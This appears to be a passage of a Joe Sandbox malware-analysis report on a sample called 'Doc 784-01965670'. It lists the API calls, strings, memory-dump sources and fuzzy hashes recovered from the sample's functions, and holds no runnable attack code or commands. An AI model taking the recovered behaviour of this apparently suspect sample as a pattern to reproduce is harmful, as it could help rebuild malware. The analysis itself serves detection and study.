                                                                                                                                    • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                    • API String ID: 4085615965-3440237614
                                                                                                                                    • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                                    • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                                                                                    • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                                    • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
APIs
Similarity
• API ID: __wcsicoll
• String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
• API String ID: 3832890014-4202584635
• Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
• Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
• Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
APIs
• _memset.LIBCMT ref: 004669C4
• _wcsncpy.LIBCMT ref: 00466A21
• _wcsncpy.LIBCMT ref: 00466A4D
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• _wcstok.LIBCMT ref: 00466A90
  • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
• _wcstok.LIBCMT ref: 00466B3F
• _wcscpy.LIBCMT ref: 00466BC8
• GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
• _wcslen.LIBCMT ref: 00466D1D
• _memset.LIBCMT ref: 00466BEE
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• _wcslen.LIBCMT ref: 00466D4B
• GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
Similarity
• API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
• String ID: X$HH
• API String ID: 3021350936-1944015008
• Opcode ID: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
• Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
• Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
APIs
• _memset.LIBCMT ref: 0045F4AE
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
• SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
• Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
Similarity
• API ID: InfoItemMenu$Sleep_memset
• String ID: 0
• API String ID: 1504565804-4108050209
• Opcode ID: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
• Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
• Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
APIs
• DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
Similarity
• API ID: Window$CreateDestroy
• String ID: ,$tooltips_class32
• API String ID: 1109047481-3856767331
• Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
• Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
• Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
APIs
• _wcsncpy.LIBCMT ref: 0045CCFA
• __wsplitpath.LIBCMT ref: 0045CD3C
• _wcscat.LIBCMT ref: 0045CD51
• _wcscat.LIBCMT ref: 0045CD63
• GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000104,?), ref: 0045CD78
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,00000104,?), ref: 0045CD8C
  • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
• GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDD0
• SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDE6
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CDF8
• SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
• _wcscpy.LIBCMT ref: 0045CE14
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CE5A
Similarity
• API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
• String ID: *.*
• API String ID: 1153243558-438819550
• Opcode ID: 5bfa431d4ef7075d2dc920e4199facb1e2714bc7465ef22df03346902ac9b5e5
• Instruction ID: 4b7f18f3392d5c51d0b0bcfc25b88d1348604f1c1aa494fd035d881d108a9fe9
• Instruction Fuzzy Hash: 0561E5B61043419FD731EF54C885AEBB7E4EB84305F44882FED8983242D67D998E879E
APIs
• _memset.LIBCMT ref: 00455127
• GetMenuItemInfoW.USER32 ref: 00455146
• DeleteMenu.USER32(?,?,00000000), ref: 004551B2
• DeleteMenu.USER32(?,?,00000000), ref: 004551C8
• GetMenuItemCount.USER32(?), ref: 004551D9
• SetMenu.USER32(?,00000000), ref: 004551E7
• DestroyMenu.USER32(?,?,00000000), ref: 004551F4
• DrawMenuBar.USER32 ref: 00455207
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Similarity
• API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 1663942905-4108050209
                                                                                                                                    • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                                    • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                                                                                    • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                                    • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
APIs
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
• String ID:
• API String ID: 1481289235-0
• Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
• Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
• Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
• Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
APIs
• ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
• ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
• SendMessageW.USER32 ref: 0046FBAF
• SendMessageW.USER32 ref: 0046FBE2
• ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
• SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
• ImageList_Create.COMCTL32(00000020,00000020,00000021,?,00000001), ref: 0046FC51
• SendMessageW.USER32(?,00001003,00000000,00000000), ref: 0046FC73
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FC97
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 0046FCA5
• SendMessageW.USER32 ref: 0046FD00
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: MessageSend$IconImageList_$CreateExtractReplace
• String ID:
• API String ID: 2632138820-0
• Opcode ID: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
• Instruction ID: f8b2170a3f6480226351c2682443129a31dd3945ebd2779c8b18a40e734619f9
• Opcode Fuzzy Hash: 84d296b218fe0245d687438722339ecf4745b7249032fe4bb2113eafbff2dc59
• Instruction Fuzzy Hash: A461BF70208305AFD320DF14DC85F5BB7E4FB89B14F10492EFA85972D1E7B4A8498B66
APIs
• LoadCursorW.USER32(00000000,00007F89), ref: 00433BC7
• LoadCursorW.USER32(00000000,00007F8A), ref: 00433BDE
• LoadCursorW.USER32(00000000,00007F03), ref: 00433BF5
• LoadCursorW.USER32(00000000,00007F8B), ref: 00433C0C
• LoadCursorW.USER32(00000000,00007F01), ref: 00433C23
• LoadCursorW.USER32(00000000,00007F88), ref: 00433C3A
• LoadCursorW.USER32(00000000,00007F86), ref: 00433C51
• LoadCursorW.USER32(00000000,00007F83), ref: 00433C68
• LoadCursorW.USER32(00000000,00007F85), ref: 00433C7F
• LoadCursorW.USER32(00000000,00007F82), ref: 00433C96
• LoadCursorW.USER32(00000000,00007F84), ref: 00433CAD
• LoadCursorW.USER32(00000000,00007F04), ref: 00433CC4
• LoadCursorW.USER32(00000000,00007F02), ref: 00433CDB
• LoadCursorW.USER32(00000000,00000000), ref: 00433CEF
• LoadCursorW.USER32(00000000,00007F00), ref: 00433D06
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: CursorLoad
• String ID:
• API String ID: 3238433803-0
• Opcode ID: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
• Instruction ID: acd63d7325575073817552101614e6badc0a76bef24473f745c9da0ba21645f6
• Opcode Fuzzy Hash: a9ae3fa102d058121485b558102ae55493db0c8a3ed3723cc80ee02977cbc66e
• Instruction Fuzzy Hash: 6D310E3058C302FFE7504F50EE0AB1C36A0BB48B47F008C7DF64AA62E0E6F055009B9A
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 00460AF5
• _wcslen.LIBCMT ref: 00460B00
• __swprintf.LIBCMT ref: 00460B9E
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00460C11
• GetClassNameW.USER32(?,?,00000400), ref: 00460C8E
• GetDlgCtrlID.USER32(?), ref: 00460CE6
• GetWindowRect.USER32(?,?), ref: 00460D21
• GetParent.USER32(?), ref: 00460D40
• ScreenToClient.USER32(00000000), ref: 00460D47
• GetClassNameW.USER32(?,?,00000100), ref: 00460DBE
• GetWindowTextW.USER32(?,?,00000400), ref: 00460DFB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
• String ID: %s%u
• API String ID: 1899580136-679674701
• Opcode ID: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
• Instruction ID: ed0b46c26cbb3f928a943cd91895a09858176ee0e89b0f6962e21683ef9d2041
• Opcode Fuzzy Hash: 263ba601bdfcacdbc09c0537f08939095875f2576dae1f9512caffb95b688f0a
• Instruction Fuzzy Hash: 3AA1CD722043019BDB14DF54C884BEB73A8FF84714F04892EFD889B245E778E946CBA6
APIs
• CoTaskMemFree.OLE32(?), ref: 0047D6D3
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• StringFromCLSID.OLE32(?,?), ref: 0047D6B5
  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
• StringFromIID.OLE32(?,?), ref: 0047D7F0
• CoTaskMemFree.OLE32(?), ref: 0047D80A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: FreeFromStringTask_wcslen$_wcscpy
• String ID: 0vH$CLSID\$Interface\$ProgID$ToolBoxBitmap32$inprocserver32$localserver32$HH
• API String ID: 2485709727-934586222
• Opcode ID: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
• Instruction ID: 9b1d76abf7044590dd80f2c514dab21f357569e7696d0ed80310904c07b122bf
• Opcode Fuzzy Hash: 94ff36e8c5adf47d5d15ad8c3baf2c81511e2686fb9cf3bb874d512fd4cd8d9e
• Instruction Fuzzy Hash: 63714BB5614201AFC304EF25C981D5BB3F8BF88704F108A2EF5599B351DB78E905CB6A
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscpy$Folder_memset$BrowseDesktopFromInitializeListMallocPathUninitialize
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 3381189665-2761332787
                                                                                                                                    • Opcode ID: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                                    • Instruction ID: 9856a5a3be2a6f4b6f15ab218c20ab076772672eb14c4daba281b2e598c2a196
                                                                                                                                    • Opcode Fuzzy Hash: cbd34bb05af2b60d6becc686f20e38c9c02ad4ea561bbadf99ecd2e28994155d
                                                                                                                                    • Instruction Fuzzy Hash: E1619AB59043009FC320EF65C88499BB7E9BFC8704F048E1EF98987252D775E849CB6A
APIs
• GetDC.USER32(00000000), ref: 00434585
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00434590
• CreateCompatibleDC.GDI32(00000000), ref: 0043459B
• SelectObject.GDI32(00000000,?), ref: 004345A9
• StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00434618
• GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00434665
Strings
Similarity
• API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
• String ID: (
• API String ID: 3300687185-3887548279
• Opcode ID: 850e4e4f4a3144c0c65e94ebd0f1e451ef245c66964f5ba666016bedf541cb72
• Instruction ID: a007e7ec8c3f390601fcb6226b5fc218b62818acb39bbc9fe8cd9ddeb27b86ed
• Opcode Fuzzy Hash: 850e4e4f4a3144c0c65e94ebd0f1e451ef245c66964f5ba666016bedf541cb72
• Instruction Fuzzy Hash: E4514871508345AFD310CF69C884B6BBBE9EF8A310F14881DFA9687390D7B5E844CB66
APIs
• LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E463
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E480
• __swprintf.LIBCMT ref: 0045E4D9
• _printf.LIBCMT ref: 0045E595
• _printf.LIBCMT ref: 0045E5B7
Strings
Similarity
• API ID: LoadString_printf$__swprintf_wcslen
• String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR $HH
• API String ID: 3590180749-2894483878
• Opcode ID: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
• Instruction ID: 42a5c2f6345f2e10047da6565a111f96cfad8617a22bea28fc44504b1d19b7ce
• Opcode Fuzzy Hash: ef66654f81976a0e6a78d75721240b4b5dad2d0c7f05b7bb9659983eace5fa73
• Instruction Fuzzy Hash: 9F51A171518345ABD324EF91CC41DAF77A8AF84754F04093FF94463292EB78EE488B6A
APIs
• GetWindowLongW.USER32(?,000000F0), ref: 0046F911
• LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 0046F929
• SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 0046F942
• DeleteObject.GDI32(?), ref: 0046F950
• DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,00000000,00000000,00000000,00002010,?,000000F0), ref: 0046F95E
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9A8
• SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 0046F9C1
• DeleteObject.GDI32(?), ref: 0046F9CF
• DestroyIcon.USER32(?,?,000000F7,00000001,00000000,?,00000001,00000000,00000000,00002010), ref: 0046F9DD
• ExtractIconExW.SHELL32(?,?,?,000000FF,00000001), ref: 0046FA1D
• DestroyIcon.USER32(?), ref: 0046FA4F
• SendMessageW.USER32(?,000000F7,00000001,?), ref: 0046FA5A
• DeleteObject.GDI32(?), ref: 0046FA68
• DestroyIcon.USER32(?,?,000000F7,00000001,?), ref: 0046FA76
Similarity
• API ID: Icon$Destroy$DeleteMessageObjectSend$ImageLoad$ExtractLongWindow
• String ID:
• API String ID: 3412594756-0
• Opcode ID: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
• Instruction ID: 2b127e2e725f503062080ad48664a75956f0b49bd2ac624c91da1236fc619d99
• Opcode Fuzzy Hash: f692dd120a8e9e8c350368ee646f6d7ebba10fee5470a76da8eaf9bc85602db5
• Instruction Fuzzy Hash: BD41B575344301ABE7209B65ED45B6B7398EB44711F00083EFA85A7381DBB9E809C76A
APIs
  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
  • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
• GetDriveTypeW.KERNEL32 ref: 0045DA30
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DA76
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DAAB
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DADF
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
Strings
Similarity
• API ID: SendString$_wcslen$BuffCharDriveLowerType
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 4013263488-4113822522
• Opcode ID: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
• Instruction ID: 78e8968fe3d68f28a61334a0544e46eb3ade7c09d07056eb4a028b8014bab4f9
• Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
• Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
APIs
Similarity
• API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
• String ID:
• API String ID: 228034949-0
• Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
• Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
• Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
• Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
• GlobalLock.KERNEL32(00000000), ref: 00433523
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
• GlobalUnlock.KERNEL32(00000000), ref: 0043353A
• CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
• GlobalFree.KERNEL32(00000000), ref: 0043357B
• GetObjectW.GDI32(?,00000018,?), ref: 004335A6
• CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
• DeleteObject.GDI32(?), ref: 00433603
• SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3969911579-0
                                                                                                                                    • Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                                    • Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
                                                                                                                                    • Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
                                                                                                                                    • Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
APIs
• GetParent.USER32 ref: 00445A8D
• GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
• __wcsicoll.LIBCMT ref: 00445AC4
• __wcsicoll.LIBCMT ref: 00445AE0
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: __wcsicoll$ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 3125838495-3381328864
• Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
• Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
• Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
• Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: CopyVariant$ErrorLast
• String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
• API String ID: 2286883814-4206948668
• Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
• Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
• Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
• Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
APIs
  • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
  • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
• GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
• _wcscpy.LIBCMT ref: 00475F18
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: BuffCharDriveLowerType_wcscpy_wcslen
• String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
• API String ID: 3052893215-4176887700
• Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
• Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
• Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
